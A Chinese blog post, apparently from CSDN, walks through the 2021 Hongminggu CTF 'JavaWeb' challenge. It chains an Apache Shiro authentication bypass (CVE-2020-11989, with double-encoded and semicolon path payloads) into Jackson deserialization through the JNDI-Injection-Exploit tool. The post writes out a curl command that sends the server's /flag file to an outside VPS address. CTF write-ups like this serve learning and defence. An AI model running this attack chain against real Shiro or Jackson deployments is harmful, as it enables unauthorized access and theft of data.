[红明谷CTF 2021]JavaWeb buu刷题记录

最新推荐文章于 2024-05-04 13:32:17 发布
最新推荐文章于 2024-05-04 13:32:17 发布
阅读量1.8k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51458899/article/details/124032593
版权

映入眼帘的报错,然后搜一下知道是spring的洞

image-20220407212748196

有个登录,然后提示json,又看到cookie

cve-2020-11989

Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989) - 腾讯安全玄武实验室 (tencent.com)

Apache Shiro权限绕过漏洞分析(CVE-2020-11989) (qq.com)

参考这两篇,得出两种攻击方式

payload1: 双编码绕过

/ -> %2f ->%25%32%66

image-20220407214542111

payload2: 分号

image-20220407214521035

使用payload2就可以成功绕过。

这时候报错会告诉jsckson,

<div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>Unexpected token (END_ARRAY), expected VALUE_STRING: need JSON String that contains type id (for subtype of java.lang.Object)
 at [Source: []; line: 1, column: 2]

尝试jackson的反序列化(这里就是知识盲区了)。

关于jackson的gadget文章:

http://b1ue.cn/archives/189.html

也是第一次遇到jackson的反序列化,像之前的fastjson的反序列化一样,可以rmi或者ldap进行攻击,学习一下这个jndi注入的工具:

https://github.com/welk1n/JNDI-Injection-Exploit/

利用curl外带出flag,也是学了一手curl -F的使用:

使用

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl 8.129.42.140:3307 -File=@/flag" -A "8.129.42.140"

按照readme在vps上安装以后,开启1099端口,并执行上面payload

image-20220407232902417

然后监听3307

之后发送json反序列化poc,建议使用burp

image-20220407232632569

image-20220407232946833

ththaiai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[红明谷CTF 2021]JavaWeb
snowlyzz的博客
01-02 721
shiro+jndi注入学习
Java安全-Java In CTF([红明谷CTF 2021]JavaWeb、[红明谷CTF 2021]JavaWeb
Love&Share
05-05 2264
文章目录[RoarCTF 2019]Easy Java[红明谷CTF 2021]JavaWeb [RoarCTF 2019]Easy Java 存在文件下载,尝试去读 WEB-INF/web.xml,get 传参发现一直失败 在 burp 中改为 post 传参,可以正常下载文件 只要再去读 class 文件即可 成功下载 class 放到 idea 中,拿到 flag [红明谷CTF 2021]JavaWeb 题目提示 /login 目录,访问提示 /json 访问 /json 跳回到 /lo.
攻击JavaWeb应用1-9[JavaWeb安全系列]
04-02
攻击JavaWeb应用1-9[JavaWeb安全系列]攻击JavaWeb应用1-9[JavaWeb安全系列]
第二届N1CTF Web Derby wp jndi注入通过Druid绕过高版本jdk打Derby Rce(2)
最新发布
m0_54903333的博客
05-04 580
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护。
大数据-算法-朝鲜数学的儒学化倾向.pdf
04-18
作者崔锡鼎,字明谷,号锡鼎,是李朝肃宗时期的大臣,著有《经世正韵图说》和《明谷集》,并编纂了《左氏辑选》。这一部分还简要介绍了崔锡鼎所处时代的党派冲突,并参考了《李朝实录》中关于他的相关记载。 第二...
【靶场练习】BUUCTF——[RoarCTF 2019]Easy Java
weixin_49422491的博客
07-31 1887
[RoarCTF 2019]Easy Java
BUUCTF 11_20
qq_62987578的博客
05-23 252
这道题虽然做出来了,但是感觉还是不是很清楚,这里WP就不写了,但是这里有一个很好,很详细的WP,推荐给大家,希望能帮助大家。然后我们可以写脚本,(写脚本这里其实卡了很久,一直在不停的试,现在感觉做这个还是没有太多方法,感觉自己分析的可能还是不是很清楚,有些地方只能猜,如果有大佬知道怎么分析的话,请一定要教教我,真的很想学明白!这是第二篇文章,有些地方是很早之前参考的CSDN的大佬的,我尽可能的吧我所参考的大佬都列出来了,但有些确实记不起来了,如果有撞了的话,很抱歉,请私信我。
BUUCTF__web题解合集(一)
风过江南乱的博客
07-22 3802
一、[极客大挑战 2019]HardSQL 二、[GXYCTF2019]BabySQli 三、[RoarCTF 2019]Easy Java 四、[De1CTF 2019]SSRF Me 五、[网鼎杯 2020 青龙组]AreUSerialz
CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现
热门推荐
Love&Share
10-12 1万+
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件中常数extension的值
CTF专题一2021网络WEB题目解析
kali_Ma的博客
10-19 6600
0x01 前言 背景: 2021年10月15日的“中国能源网络安全大赛” 感觉WEB的考点形形色色,其中有1道偏于黑盒测试的简单题目,4道是白盒审计类题目,还有一道是Python的反序列化题目,题目名称大致如下: 因为唯一的一道黑盒题目还是文件包含题目,所以将题目源代码全部扒下来了,给大家提供复现环境。(flag自己创建)。 为了感谢广大读者伙伴的支持,准备了以下福利给到大家: [一>获取<一] 1、200多本网络安全系列电子书(该有的都有了) 2、全套工具包(最全中文版,想用哪个用哪个)
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
m0_61206225的博客
11-08 1086
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
BUUCTF WEB filejava
qq_41696858的博客
09-30 1202
简单总结一下,上传的xlsx文件在解析时会调动到[Content_Types].xml的恶意代码,从而去vps上执行含有恶意xxe的file.dtd文件,而这个文件的执行结果就是把受害机。由于扫出来是tomcat,做过java web业务的都知道最重要的一个配置文件是WEB-INF里面的web.xml文件,说他是万物之祖也不为过。先说一下,kali尽量不要更新到python 3.10,否则好多工具都不能用了。这题提示是java题目,上来先是一个上传窗口,尝试文件上传直接写马,发现不行。
BUUCTFweb方向题目(四)
wanan的博客
10-06 385
BUUCTFweb方向题目(四)
ctfweb小白必备JavaScip知识
qq_48511129的博客
02-03 393
JavaScript的代码嵌入在HTML里,直接在客户端的浏览器上执行,属于前端语言。 大多数的xss代码都是使用JavaScript语言编写的。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>javascipt</title> </head> <body> <script>
CTF题为例,浅学一些JAVAweb项目相关知识
Welcome To MakaRi's Blog!
03-22 1781
本文更加偏重于学习题目有关的JAVA知识,而非解题思路,题目的解题与本文讲到的知识点大多无关。但是通过题目学习这些知识可以帮助理解JAVA中web服务和数据库连接的实现,知道了JAVA如何启动服务以及如何连接数据库,这是以后进行JAVA安全学习的前提和基础。本人大一,比较菜且基础薄弱,如有错误还望大佬指点。
WebCTFSHOW java刷题记录(全)
uuzeray的博客
02-17 1296
给了war包,解压得到class文件,用java反编译工具来读源码。进行一波S2-009 showcase rce的搜。直接访问/getFlag路径回显如下,这条路走不通。不能直接读环境变量,拿个whoami意思一下(进行一波S2-008 devmode的搜。打不出来啊,只能用羽师傅的脚本了。进行一波S2-037的搜。进行一波S2-045的搜。进行一波S2-032的搜。进行一波S2-033的搜。进行一波S2-016的搜。进行一波S2-019的搜。进行一波S2-029的搜。进行一波S2-048的搜。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值